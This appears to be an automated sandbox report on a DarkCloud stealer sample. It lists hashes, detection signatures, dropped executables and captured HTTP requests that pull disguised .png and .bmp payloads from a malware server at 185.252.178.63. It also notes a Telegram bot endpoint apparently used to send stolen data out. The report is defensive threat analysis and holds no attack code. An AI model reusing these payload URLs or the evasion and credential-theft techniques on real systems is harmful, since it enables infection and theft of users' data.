Windows Analysis Report
BPL_1000572_007.bat.exe

Overview

General Information

Sample Name: BPL_1000572_007.bat.exe
Analysis ID: 708242
MD5: 4ff4a281a08a0681597794a3024fb584
SHA1: d3a70362b238b82db1ef1aefef920afedf717880
SHA256: a6db7e8c70adc90b74c0f08503f49cf041d79afed3b916676892725ce2dbcce0
Tags: exe

Detection

DarkCloud
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Generic Dropper
Yara detected DarkCloud
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates multiple autostart registry keys
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Machine Learning detection for dropped file
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

AV Detection

Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Roaming\note\pdf.exe ReversingLabs: Detection: 32%
Source: BPL_1000572_007.bat.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Joe Sandbox ML: detected
Source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: BPL_1000572_007.bat.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: BPL_1000572_007.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .pdb= source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Xml.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: BPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.pdb\ source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.pdbj source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Xml.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: mscorlib.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDBL source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.pdb4: source: WER8A92.tmp.dmp.21.dr
Source: Binary string: Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.ni.pdb source: WER8A92.tmp.dmp.21.dr

Networking

Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49707 -> 185.252.178.63:80
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49710 -> 185.252.178.63:80
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49711 -> 185.252.178.63:80
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49712 -> 185.252.178.63:80
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.6:49715 -> 185.252.178.63:80
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe DNS query: name: showip.net
Source: Joe Sandbox View ASN Name: LVLT-10753US LVLT-10753US
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/inf_Hpgwbzkt.bmp HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1Host: 185.252.178.63Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 185.252.178.63 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.178.63
Source: BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590879859.000000000329C000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.252.178.63
Source: BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590699923.0000000003291000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.png
Source: BPL_1000572_007.bat.exe, pdf.exe.0.dr, fireless.exe.13.dr String found in binary or memory: http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngP/r/
Source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp
Source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.430950598.00000000006D2000.00000002.00000001.01000000.00000007.sdmp, Wthdlxoyqvnqsfcfiinf.exe.0.dr String found in binary or memory: http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp)Acugwsmmzufefycomfxvihl
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0K
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schema.org
Source: BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590879859.000000000329C000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BPL_1000572_007.bat.exe, 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://showip.netxhttp://www.mediacollege.com/internet/utilities/show-ip.shtml__vbaLsetFixstr__vbaFi
Source: Amcache.hve.21.dr String found in binary or memory: http://upx.sf.net
Source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BPL_1000572_007.bat.exe, 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot4(SpawnProcess)
Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
